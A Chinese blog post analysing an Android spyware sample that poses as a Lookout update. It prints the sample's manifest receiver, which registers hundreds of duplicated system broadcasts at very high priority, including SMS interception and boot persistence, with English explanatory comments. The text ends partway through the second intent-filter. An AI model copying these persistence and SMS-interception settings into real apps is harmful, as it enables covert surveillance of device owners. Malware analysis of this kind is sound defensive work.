本文章由Jack_Jia编写,转载请注明出处。
文章链接:http://blog.csdn.net/jiazhijun/article/details/8649473
作者:Jack_Jia 邮箱:309zhijun@163.com
一、序言
该病毒由TrustGo安全分析人员在Google Play发现,该应用伪装成移动安全软件“Lookout”的升级程序,它可以窃取安卓设备上的短信/彩信、视频文件、SD卡上的任意文件。本文将对该病毒的工作原理进行分析。
二、病毒样本基本信息
Md5:26905184ee9ce89cf12a04cbe00d60c2
Package:com.updateszxt
1、查看AndroidManifest.xml文件
<!-- .StartService: the sample's wake-up hook. The two intent-filters below subscribe it to
     nearly every system broadcast (boot, screen, battery, network, Bluetooth, SMS/WAP push,
     package and media events), so almost any device activity re-enters its code. No
     android:exported attribute is declared; on the Android versions this sample was built for,
     a receiver that declares an intent-filter is exported by default. -->
<receiver android:name=".StartService">
<!-- android:priority="100000" is far above IntentFilter.SYSTEM_HIGH_PRIORITY (1000). For
     ordered broadcasts such as SMS_RECEIVED this asks to run ahead of other receivers
     (relevant on pre-4.4 devices, where a high-priority receiver could see a message before
     the messaging app). Whether the framework clamps this value for receivers depends on the
     Android version; confirm for the sample's target API level. -->
<intent-filter android:priority="100000">
<action android:name="com.android.vending.INSTALL_REFERRER" />
<action android:name="com.lookout.labs.planb.intent.action.LAUNCHED" />
<action android:name="android.bluetooth.intent.action.BONDING_CREATED" />
<action android:name="android.bluetooth.intent.action.BONDING_REMOVED" />
<action android:name="android.bluetooth.intent.action.DISABLED" />
<action android:name="android.bluetooth.intent.action.DISCOVERY_COMPLETED" />
<action android:name="android.bluetooth.intent.action.DISCOVERY_STARTED" />
<action android:name="android.bluetooth.intent.action.ENABLED" />
<action android:name="android.bluetooth.intent.action.HEADSET_STATE_CHANGED" />
<action android:name="android.bluetooth.intent.action.MODE_CHANGED" />
<action android:name="android.bluetooth.intent.action.NAME_CHANGED" />
<action android:name="android.bluetooth.intent.action.PAIRING_CANCEL" />
<action android:name="android.bluetooth.intent.action.PAIRING_REQUEST" />
<action android:name="android.bluetooth.intent.action.REMOTE_ALIAS_CHANGED" />
<action android:name="android.bluetooth.intent.action.REMOTE_ALIAS_CLEARED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_CONNECTED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISAPPEARED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISAPPEARED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISCONNECTED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISCONNECT_REQUESTED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_FOUND" />
<action android:name="android.bluetooth.intent.action.REMOTE_NAME_FAILED" />
<action android:name="android.bluetooth.intent.action.REMOTE_NAME_UPDATED" />
<action android:name="android.intent.action.AIRPLANE_MODE" />
<action android:name="android.intent.action.BATTERY_CHANGED" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.CAMERA_BUTTON" />
<action android:name="android.intent.action.CONFIGURATION_CHANGED" />
<action android:name="android.intent.action.DATA_SMS_RECEIVED" />
<action android:name="android.intent.action.DATE_CHANGED" />
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" />
<action android:name="android.intent.action.DEVICE_STORAGE_OK" />
<action android:name="android.intent.action.GTALK_CONNECTED" />
<action android:name="android.intent.action.GTALK_DISCONNECTED" />
<action android:name="android.intent.action.HEADSET_PLUG" />
<action android:name="android.intent.action.MANAGE_PACKAGE_STORAGE" />
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL" />
<action android:name="android.intent.action.MEDIA_BUTTON" />
<action android:name="android.intent.action.MEDIA_EJECT" />
<action android:name="android.intent.action.MEDIA_MOUNTED" />
<action android:name="android.intent.action.MEDIA_REMOVED" />
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED" />
<action android:name="android.intent.action.MEDIA_SCANNER_SCAN_FILE" />
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED" />
<action android:name="android.intent.action.MEDIA_SHARED" />
<action android:name="android.intent.action.MEDIA_UNMOUNTABLE" />
<action android:name="android.intent.action.MEDIA_UNMOUNTED" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.PACKAGE_ADDED" />
<action android:name="android.intent.action.PACKAGE_CHANGED" />
<action android:name="android.intent.action.PACKAGE_INSTALL" />
<action android:name="android.intent.action.PACKAGE_REMOVED" />
<action android:name="android.intent.action.PACKAGE_RESTARTED" />
<action android:name="android.intent.action.POWER_CONNECTED" />
<action android:name="android.intent.action.POWER_DISCONNECTED" />
<action android:name="android.intent.action.PROVIDER_CHANGED" />
<action android:name="android.intent.action.REBOOT" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.intent.action.TIMEZONE_CHANGED" />
<action android:name="android.intent.action.TIME_SET" />
<action android:name="android.intent.action.TIME_TICK" />
<action android:name="android.intent.action.UID_REMOVED" />
<action android:name="android.intent.action.UMS_CONNECTED" />
<action android:name="android.intent.action.UMS_DISCONNECTED" />
<action android:name="android.intent.action.WALLPAPER_CHANGED" />
<action android:name="android.media.RINGER_MODE_CHANGED" />
<action android:name="android.media.VIBRATE_SETTING_CHANGED" />
<action android:name="android.net.wifi.NETWORK_IDS_CHANGED" />
<action android:name="android.net.wifi.RSSI_CHANGED" />
<action android:name="android.net.wifi.SCAN_RESULTS" />
<action android:name="android.net.wifi.STATE_CHANGE" />
<action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
<action android:name="android.net.wifi.supplicant.CONNECTION_CHANGE" />
<action android:name="android.net.wifi.supplicant.STATE_CHANGE" />
<action android:name="android.provider.Telephony.SIM_FULL" />
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
<action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED" />
<action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.intent.action.USER_PRESENT" />
<action android:name="android.intent.action.TIME_TICK" />
<action android:name="android.intent.action.TIME_SET" />
<action android:name="android.intent.action.DATE_CHANGED" />
<action android:name="android.intent.action.TIMEZONE_CHANGED" />
<action android:name="android.intent.action.ALARM_CHANGED" />
<action android:name="android.intent.action.SYNC_STATE_CHANGED" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.CLOSE_SYSTEM_DIALOGS" />
<action android:name="android.intent.action.PACKAGE_INSTALL" />
<action android:name="android.intent.action.PACKAGE_ADDED" />
<action android:name="android.intent.action.PACKAGE_REPLACED" />
<action android:name="android.intent.action.PACKAGE_REMOVED" />
<action android:name="android.intent.action.PACKAGE_CHANGED" />
<action android:name="android.intent.action.PACKAGE_RESTARTED" />
<action android:name="android.intent.action.PACKAGE_DATA_CLEARED" />
<action android:name="android.intent.action.UID_REMOVED" />
<action android:name="android.intent.action.WALLPAPER_CHANGED" />
<action android:name="android.intent.action.CONFIGURATION_CHANGED" />
<action android:name="android.intent.action.LOCALE_CHANGED" />
<action android:name="android.intent.action.BATTERY_CHANGED" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.BATTERY_OKAY" />
<action android:name="android.intent.action.ACTION_POWER_CONNECTED" />
<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
<action android:name="android.intent.action.ACTION_SHUTDOWN" />
<action android:name="android.intent.action.ACTION_REQUEST_SHUTDOWN" />
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" />
<action android:name="android.intent.action.DEVICE_STORAGE_OK" />
<action android:name="android.intent.action.MANAGE_PACKAGE_STORAGE" />
<action android:name="android.intent.action.UMS_CONNECTED" />
<action android:name="android.intent.action.UMS_DISCONNECTED" />
<action android:name="android.intent.action.MEDIA_REMOVED" />
<action android:name="android.intent.action.MEDIA_UNMOUNTED" />
<action android:name="android.intent.action.MEDIA_CHECKING" />
<action android:name="android.intent.action.MEDIA_NOFS" />
<action android:name="android.intent.action.MEDIA_MOUNTED" />
<action android:name="android.intent.action.MEDIA_SHARED" />
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL" />
<action android:name="android.intent.action.MEDIA_UNMOUNTABLE" />
<action android:name="android.intent.action.MEDIA_EJECT" />
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED" />
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED" />
<action android:name="android.intent.action.MEDIA_SCANNER_SCAN_FILE" />
<action android:name="android.intent.action.MEDIA_BUTTON" />
<action android:name="android.intent.action.CAMERA_BUTTON" />
<action android:name="android.intent.action.GTALK_CONNECTED" />
<action android:name="android.intent.action.GTALK_DISCONNECTED" />
<action android:name="android.intent.action.INPUT_METHOD_CHANGED" />
<action android:name="android.intent.action.AIRPLANE_MODE" />
<action android:name="android.intent.action.PROVIDER_CHANGED" />
<action android:name="android.intent.action.HEADSET_PLUG" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.REBOOT" />
<action android:name="android.intent.action.DOCK_EVENT" />
<action android:name="android.intent.action.REMOTE_INTENT" />
<action android:name="android.intent.action.PRE_BOOT_COMPLETED" />
<action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
<action android:name="android.net.conn.BACKGROUND_DATA_SETTING_CHANGED" />
<action android:name="android.bluetooth.adapter.action.STATE_CHANGED" />
<action android:name="android.media.RINGER_MODE_CHANGED" />
<action android:name="com.android.sync.SYNC_CONN_STATUS_CHANGED" />
<action android:name="android.net.conn.BACKGROUND_DATA_SETTING_CHANGED" />
<action android:name="android.intent.action.CLOSE_SYSTEM_DIALOGS" />
<action android:name="android.intent.action.PHONE_STATE" />
<action android:name="android.accounts.AccountAuthenticator" />
<action android:name="android.accounts.LOGIN_ACCOUNTS_CHANGED" />
<action android:name="android.intent.action.DOWNLOAD_COMPLETE" />
<action android:name="android.intent.action.DOWNLOAD_NOTIFICATION_CLICKED" />
<action android:name="android.location.PROVIDERS_CHANGED" />
<action android:name="android.speech.action.GET_LANGUAGE_DETAILS" />
<action android:name="android.app.action.ACTION_PASSWORD_CHANGED" />
<action android:name="android.app.action.ACTION_PASSWORD_FAILED" />
<action android:name="android.app.action.ACTION_PASSWORD_SUCCEEDED" />
<action android:name="android.app.action.DEVICE_ADMIN_DISABLED" />
<action android:name="android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED" />
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
<action android:name="android.bluetooth.a2dp.action.SINK_STATE_CHANGED" />
<action android:name="android.bluetooth.adapter.action.DISCOVERY_FINISHED" />
<action android:name="android.bluetooth.adapter.action.DISCOVERY_STARTED" />
<action android:name="android.bluetooth.adapter.action.LOCAL_NAME_CHANGED" />
<action android:name="android.bluetooth.adapter.action.SCAN_MODE_CHANGED" />
<action android:name="android.bluetooth.adapter.action.STATE_CHANGED" />
<action android:name="android.bluetooth.device.action.ACL_CONNECTED" />
<action android:name="android.bluetooth.device.action.ACL_DISCONNECTED" />
<action android:name="android.bluetooth.device.action.ACL_DISCONNECT_REQUESTED" />
<action android:name="android.bluetooth.device.action.BOND_STATE_CHANGED" />
<action android:name="android.bluetooth.device.action.CLASS_CHANGED" />
<action android:name="android.bluetooth.device.action.FOUND" />
<action android:name="android.bluetooth.device.action.NAME_CHANGED" />
<action android:name="android.bluetooth.devicepicker.action.DEVICE_SELECTED" />
<action android:name="android.bluetooth.devicepicker.action.LAUNCH" />
<action android:name="android.bluetooth.headset.action.AUDIO_STATE_CHANGED" />
<action android:name="android.bluetooth.headset.action.STATE_CHANGED" />
<action android:name="android.intent.action.ACTION_POWER_CONNECTED" />
<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
<action android:name="android.intent.action.ACTION_SHUTDOWN" />
<action android:name="android.intent.action.AIRPLANE_MODE" />
<action android:name="android.intent.action.BATTERY_CHANGED" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.BATTERY_OKAY" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.CAMERA_BUTTON" />
<action android:name="android.intent.action.CONFIGURATION_CHANGED" />
<action android:name="android.intent.action.DATA_SMS_RECEIVED" />
<action android:name="android.intent.action.DATE_CHANGED" />
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" />
<action android:name="android.intent.action.DEVICE_STORAGE_OK" />
<action android:name="android.intent.action.DOCK_EVENT" />
<action android:name="android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE" />
<action android:name="android.intent.action.EXTERNAL_APPLICATIONS_UNAVAILABLE" />
<action android:name="android.intent.action.GTALK_CONNECTED" />
<action android:name="android.intent.action.GTALK_DISCONNECTED" />
<action android:name="android.intent.action.HEADSET_PLUG" />
<action android:name="android.intent.action.INPUT_METHOD_CHANGED" />
<action android:name="android.intent.action.LOCALE_CHANGED" />
<action android:name="android.intent.action.MANAGE_PACKAGE_STORAGE" />
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL" />
<action android:name="android.intent.action.MEDIA_BUTTON" />
<action android:name="android.intent.action.MEDIA_CHECKING" />
<action android:name="android.intent.action.MEDIA_EJECT" />
<action android:name="android.intent.action.MEDIA_MOUNTED" />
<action android:name="android.intent.action.MEDIA_NOFS" />
<action android:name="android.intent.action.MEDIA_REMOVED" />
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED" />
<action android:name="android.intent.action.MEDIA_SCANNER_SCAN_FILE" />
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED" />
<action android:name="android.intent.action.MEDIA_SHARED" />
<action android:name="android.intent.action.MEDIA_UNMOUNTABLE" />
<action android:name="android.intent.action.MEDIA_UNMOUNTED" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.PACKAGE_ADDED" />
<action android:name="android.intent.action.PACKAGE_CHANGED" />
<action android:name="android.intent.action.PACKAGE_DATA_CLEARED" />
<action android:name="android.intent.action.PACKAGE_INSTALL" />
<action android:name="android.intent.action.PACKAGE_REMOVED" />
<action android:name="android.intent.action.PACKAGE_REPLACED" />
<action android:name="android.intent.action.PACKAGE_RESTARTED" />
<action android:name="android.intent.action.PHONE_STATE" />
<action android:name="android.intent.action.PROVIDER_CHANGED" />
<action android:name="android.intent.action.REBOOT" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.intent.action.TIMEZONE_CHANGED" />
<action android:name="android.intent.action.TIME_SET" />
<action android:name="android.intent.action.TIME_TICK" />
<action android:name="android.intent.action.UID_REMOVED" />
<action android:name="android.intent.action.UMS_CONNECTED" />
<action android:name="android.intent.action.UMS_DISCONNECTED" />
<action android:name="android.intent.action.USER_PRESENT" />
<action android:name="android.intent.action.WALLPAPER_CHANGED" />
<action android:name="android.media.AUDIO_BECOMING_NOISY" />
<action android:name="android.media.RINGER_MODE_CHANGED" />
<action android:name="android.media.SCO_AUDIO_STATE_CHANGED" />
<action android:name="android.media.VIBRATE_SETTING_CHANGED" />
<action android:name="android.media.action.CLOSE_AUDIO_EFFECT_CONTROL_SESSION" />
<action android:name="android.media.action.OPEN_AUDIO_EFFECT_CONTROL_SESSION" />
<action android:name="android.net.conn.BACKGROUND_DATA_SETTING_CHANGED" />
<action android:name="android.net.wifi.NETWORK_IDS_CHANGED" />
<action android:name="android.net.wifi.RSSI_CHANGED" />
<action android:name="android.net.wifi.SCAN_RESULTS" />
<action android:name="android.net.wifi.STATE_CHANGE" />
<action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
<action android:name="android.net.wifi.supplicant.CONNECTION_CHANGE" />
<action android:name="android.net.wifi.supplicant.STATE_CHANGE" />
<action android:name="android.provider.Telephony.SIM_FULL" />
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
<action android:name="android.provider.Telephony.SMS_REJECTED" />
<action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED" />
<action android:name="android.speech.tts.TTS_QUEUE_PROCESSING_COMPLETED" />
<action android:name="android.speech.tts.engine.TTS_DATA_INSTALLED" />
<!-- NOTE(review): the empty scheme is what keeps this filter matching broadcasts that carry no
     data URI (IntentFilter.matchData compares a null URI scheme as ""); the remaining <data>
     schemes cover URI-bearing broadcasts such as PACKAGE_* (package:) and file/content URIs.
     Without the empty scheme, listing any <data> element would stop the URI-less actions above
     from matching. Confirm against the framework source for the sample's target API level. -->
<data android:scheme="" />
<data android:scheme="package" />
<data android:scheme="content" />
<data android:scheme="http" />
<data android:scheme="https" />
<data android:scheme="file" />
<data android:scheme="ftp" />
<data android:scheme="about" />
<data android:scheme="javascript" />
<data android:scheme="inline" />
<data android:scheme="sms" />
<data android:scheme="smsto" />
<data android:scheme="mms" />
<data android:scheme="tel" />
<data android:scheme="directory" />
<data android:scheme="folder" />
<data android:scheme="imto" />
<data android:scheme="voicemail" />
<data android:scheme="user" />
</intent-filter>
<!-- Second filter: the same 253 action lines as the first, without any <data> element, so it
     matches the same actions for intents that carry no data. Many actions repeat within and
     across the two filters (SCREEN_OFF, BOOT_COMPLETED, PACKAGE_ADDED, ...); the repetition
     appears to add nothing beyond the first occurrence and mainly pads the manifest. -->
<intent-filter android:priority="100000">
<action android:name="com.android.vending.INSTALL_REFERRER" />
<action android:name="com.lookout.labs.planb.intent.action.LAUNCHED" />
<action android:name="android.bluetooth.intent.action.BONDING_CREATED" />
<action android:name="android.bluetooth.intent.action.BONDING_REMOVED" />
<action android:name="android.bluetooth.intent.action.DISABLED" />
<action android:name="android.bluetooth.intent.action.DISCOVERY_COMPLETED" />
<action android:name="android.bluetooth.intent.action.DISCOVERY_STARTED" />
<action android:name="android.bluetooth.intent.action.ENABLED" />
<action android:name="android.bluetooth.intent.action.HEADSET_STATE_CHANGED" />
<action android:name="android.bluetooth.intent.action.MODE_CHANGED" />
<action android:name="android.bluetooth.intent.action.NAME_CHANGED" />
<action android:name="android.bluetooth.intent.action.PAIRING_CANCEL" />
<action android:name="android.bluetooth.intent.action.PAIRING_REQUEST" />
<action android:name="android.bluetooth.intent.action.REMOTE_ALIAS_CHANGED" />
<action android:name="android.bluetooth.intent.action.REMOTE_ALIAS_CLEARED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_CONNECTED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISAPPEARED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISAPPEARED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISCONNECTED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISCONNECT_REQUESTED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_FOUND" />
<action android:name="android.bluetooth.intent.action.REMOTE_NAME_FAILED" />
<action android:name="android.bluetooth.intent.action.REMOTE_NAME_UPDATED" />
<action android:name="android.intent.action.AIRPLANE_MODE" />
<action android:name="android.intent.action.BATTERY_CHANGED" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.CAMERA_BUTTON" />
<action android:name="android.intent.action.CONFIGURATION_CHANGED" />
<action android:name="android.intent.action.DATA_SMS_RECEIVED" />
<action android:name="android.intent.action.DATE_CHANGED" />
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" />
<action android:name="android.intent.action.DEVICE_STORAGE_OK" />
<action android:name="android.intent.action.GTALK_CONNECTED" />
<action android:name="android.intent.action.GTALK_DISCONNECTED" />
<action android:name="android.intent.action.HEADSET_PLUG" />
<action android:name="android.intent.action.MANAGE_PACKAGE_STORAGE" />
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL" />
<action android:name="android.intent.action.MEDIA_BUTTON" />
<action android:name="android.intent.action.MEDIA_EJECT" />
<action android:name="android.intent.action.MEDIA_MOUNTED" />
<action android:name="android.intent.action.MEDIA_REMOVED" />
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED" />
<action android:name="android.intent.action.MEDIA_SCANNER_SCAN_FILE" />
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED" />
<action android:name="android.intent.action.MEDIA_SHARED" />
<action android:name="android.intent.action.MEDIA_UNMOUNTABLE" />
<action android:name="android.intent.action.MEDIA_UNMOUNTED" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.PACKAGE_ADDED" />
<action android:name="android.intent.action.PACKAGE_CHANGED" />
<action android:name="android.intent.action.PACKAGE_INSTALL" />
<action android:name="android.intent.action.PACKAGE_REMOVED" />
<action android:name="android.intent.action.PACKAGE_RESTARTED" />
<action android:name="android.intent.action.POWER_CONNECTED" />
<action android:name="android.intent.action.POWER_DISCONNECTED" />
<action android:name="android.intent.action.PROVIDER_CHANGED" />
<action android:name="android.intent.action.REBOOT" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.intent.action.TIMEZONE_CHANGED" />
<action android:name="android.intent.action.TIME_SET" />
<action android:name="android.intent.action.TIME_TICK" />
<action android:name="android.intent.action.UID_REMOVED" />
<action android:name="android.intent.action.UMS_CONNECTED" />
<action android:name="android.intent.action.UMS_DISCONNECTED" />
<action android:name="android.intent.action.WALLPAPER_CHANGED" />
<action android:name="android.media.RINGER_MODE_CHANGED" />
<action android:name="android.media.VIBRATE_SETTING_CHANGED" />
<action android:name="android.net.wifi.NETWORK_IDS_CHANGED" />
<action android:name="android.net.wifi.RSSI_CHANGED" />
<action android:name="android.net.wifi.SCAN_RESULTS" />
<action android:name="android.net.wifi.STATE_CHANGE" />
<action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
<action android:name="android.net.wifi.supplicant.CONNECTION_CHANGE" />
<action android:name="android.net.wifi.supplicant.STATE_CHANGE" />
<action android:name="android.provider.Telephony.SIM_FULL" />
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
<action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED" />
<action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.intent.action.USER_PRESENT" />
<action android:name="android.intent.action.TIME_TICK" />
<action android:name="android.intent.action.TIME_SET" />
<action android:name="android.intent.action.DATE_CHANGED" />
<action android:name="android.intent.action.TIMEZONE_CHANGED" />
<action android:name="android.intent.action.ALARM_CHANGED" />
<action android:name="android.intent.action.SYNC_STATE_CHANGED" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.CLOSE_SYSTEM_DIALOGS" />
<action android:name="android.intent.action.PACKAGE_INSTALL" />
<action android:name="android.intent.action.PACKAGE_ADDED" />
<action android:name="android.intent.action.PACKAGE_REPLACED" />
<action android:name="android.intent.action.PACKAGE_REMOVED" />
<action android:name="android.intent.action.PACKAGE_CHANGED" />
<action android:name="android.intent.action.PACKAGE_RESTARTED" />
<action android:name="android.intent.action.PACKAGE_DATA_CLEARED" />
<action android:name="android.intent.action.UID_REMOVED" />
<action android:name="android.intent.action.WALLPAPER_CHANGED" />
<action android:name="android.intent.action.CONFIGURATION_CHANGED" />
<action android:name="android.intent.action.LOCALE_CHANGED" />
<action android:name="android.intent.action.BATTERY_CHANGED" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.BATTERY_OKAY" />
<action android:name="android.intent.action.ACTION_POWER_CONNECTED" />
<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
<action android:name="android.intent.action.ACTION_SHUTDOWN" />
<action android:name="android.intent.action.ACTION_REQUEST_SHUTDOWN" />
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" />
<action android:name="android.intent.action.DEVICE_STORAGE_OK" />
<action android:name="android.intent.action.MANAGE_PACKAGE_STORAGE" />
<action android:name="android.intent.action.UMS_CONNECTED" />
<action android:name="android.intent.action.UMS_DISCONNECTED" />
<action android:name="android.intent.action.MEDIA_REMOVED" />
<action android:name="android.intent.action.MEDIA_UNMOUNTED" />
<action android:name="android.intent.action.MEDIA_CHECKING" />
<action android:name="android.intent.action.MEDIA_NOFS" />
<action android:name="android.intent.action.MEDIA_MOUNTED" />
<action android:name="android.intent.action.MEDIA_SHARED" />
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL" />
<action android:name="android.intent.action.MEDIA_UNMOUNTABLE" />
<action android:name="android.intent.action.MEDIA_EJECT" />
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED" />
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED" />
<action android:name="android.intent.action.MEDIA_SCANNER_SCAN_FILE" />
<action android:name="android.intent.action.MEDIA_BUTTON" />
<action android:name="android.intent.action.CAMERA_BUTTON" />
<action android:name="android.intent.action.GTALK_CONNECTED" />
<action android:name="android.intent.action.GTALK_DISCONNECTED" />
<action android:name="android.intent.action.INPUT_METHOD_CHANGED" />
<action android:name="android.intent.action.AIRPLANE_MODE" />
<action android:name="android.intent.action.PROVIDER_CHANGED" />
<action android:name="android.intent.action.HEADSET_PLUG" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.REBOOT" />
<action android:name="android.intent.action.DOCK_EVENT" />
<action android:name="android.intent.action.REMOTE_INTENT" />
<action android:name="android.intent.action.PRE_BOOT_COMPLETED" />
<action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
<action android:name="android.net.conn.BACKGROUND_DATA_SETTING_CHANGED" />
<action android:name="android.bluetooth.adapter.action.STATE_CHANGED" />
<action android:name="android.media.RINGER_MODE_CHANGED" />
<action android:name="com.android.sync.SYNC_CONN_STATUS_CHANGED" />
<action android:name="android.net.conn.BACKGROUND_DATA_SETTING_CHANGED" />
<action android:name="android.intent.action.CLOSE_SYSTEM_DIALOGS" />
<action android:name="android.intent.action.PHONE_STATE" />
<action android:name="android.accounts.AccountAuthenticator" />
<action android:name="android.accounts.LOGIN_ACCOUNTS_CHANGED" />
<action android:name="android.intent.action.DOWNLOAD_COMPLETE" />
<action android:name="android.intent.action.DOWNLOAD_NOTIFICATION_CLICKED" />
<action android:name="android.location.PROVIDERS_CHANGED" />
<action android:name="android.speech.action.GET_LANGUAGE_DETAILS" />
<action android:name="android.app.action.ACTION_PASSWORD_CHANGED" />
<action android:name="android.app.action.ACTION_PASSWORD_FAILED" />
<action android:name="android.app.action.ACTION_PASSWORD_SUCCEEDED" />
<action android:name="android.app.action.DEVICE_ADMIN_DISABLED" />
<action android:name="android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED" />
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
<action android:name="android.bluetooth.a2dp.action.SINK_STATE_CHANGED" />
<action android:name="android.bluetooth.adapter.action.DISCOVERY_FINISHED" />
<action android:name="android.bluetooth.adapter.action.DISCOVERY_STARTED" />
<action android:name="android.bluetooth.adapter.action.LOCAL_NAME_CHANGED" />
<action android:name="android.bluetooth.adapter.action.SCAN_MODE_CHANGED" />
<action android:name="android.bluetooth.adapter.action.STATE_CHANGED" />
<action android:name="android.bluetooth.device.action.ACL_CONNECTED" />
<action android:name="android.bluetooth.device.action.ACL_DISCONNECTED" />
<action android:name="android.bluetooth.device.action.ACL_DISCONNECT_REQUESTED" />
<action android:name="android.bluetooth.device.action.BOND_STATE_CHANGED" />
<action android:name="android.bluetooth.device.action.CLASS_CHANGED" />
<action android:name="android.bluetooth.device.action.FOUND" />
<action android:name="android.bluetooth.device.action.NAME_CHANGED" />
<action android:name="android.bluetooth.devicepicker.action.DEVICE_SELECTED" />
<action android:name="android.bluetooth.devicepicker.action.LAUNCH" />
<action android:name="android.bluetooth.headset.action.AUDIO_STATE_CHANGED" />
<action android:name="android.bluetooth.headset.action.STATE_CHANGED" />
<action android:name="android.intent.action.ACTION_POWER_CONNECTED" />
<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
<action android:name="android.intent.action.ACTION_SHUTDOWN" />
<action android:name="android.intent.action.AIRPLANE_MODE" />
<action android:name="android.intent.action.BATTERY_CHANGED" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.BATTERY_OKAY" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.CAMERA_BUTTON" />
<action android:name="android.intent.action.CONFIGURATION_CHANGED" />
<action android:name="android.intent.action.DATA_SMS_RECEIVED" />
<action android:name="android.intent.action.DATE_CHANGED" />
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" />
<action android:name="android.intent.action.DEVICE_STORAGE_OK" />
<action android:name="android.intent.action.DOCK_EVENT" />
<action android:name="android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE" />
<action android:name="android.intent.action.EXTERNAL_APPLICATIONS_UNAVAILABLE" />
<action android:name="android.intent.action.GTALK_CONNECTED" />
<action android:name="android.intent.action.GTALK_DISCONNECTED" />
<action android:name="android.intent.action.HEADSET_PLUG" />
<action android:name="android.intent.action.INPUT_METHOD_CHANGED" />
<action android:name="android.intent.action.LOCALE_CHANGED" />
<action android:name="android.intent.action.MANAGE_PACKAGE_STORAGE" />
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL" />
<action android:name="android.intent.action.MEDIA_BUTTON" />
<action android:name="android.intent.action.MEDIA_CHECKING" />
<action android:name="android.intent.action.MEDIA_EJECT" />
<action android:name="android.intent.action.MEDIA_MOUNTED" />
<action android:name="android.intent.action.MEDIA_NOFS" />
<action android:name="android.intent.action.MEDIA_REMOVED" />
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED" />
<action android:name="android.intent.action.MEDIA_SCANNER_SCAN_FILE" />
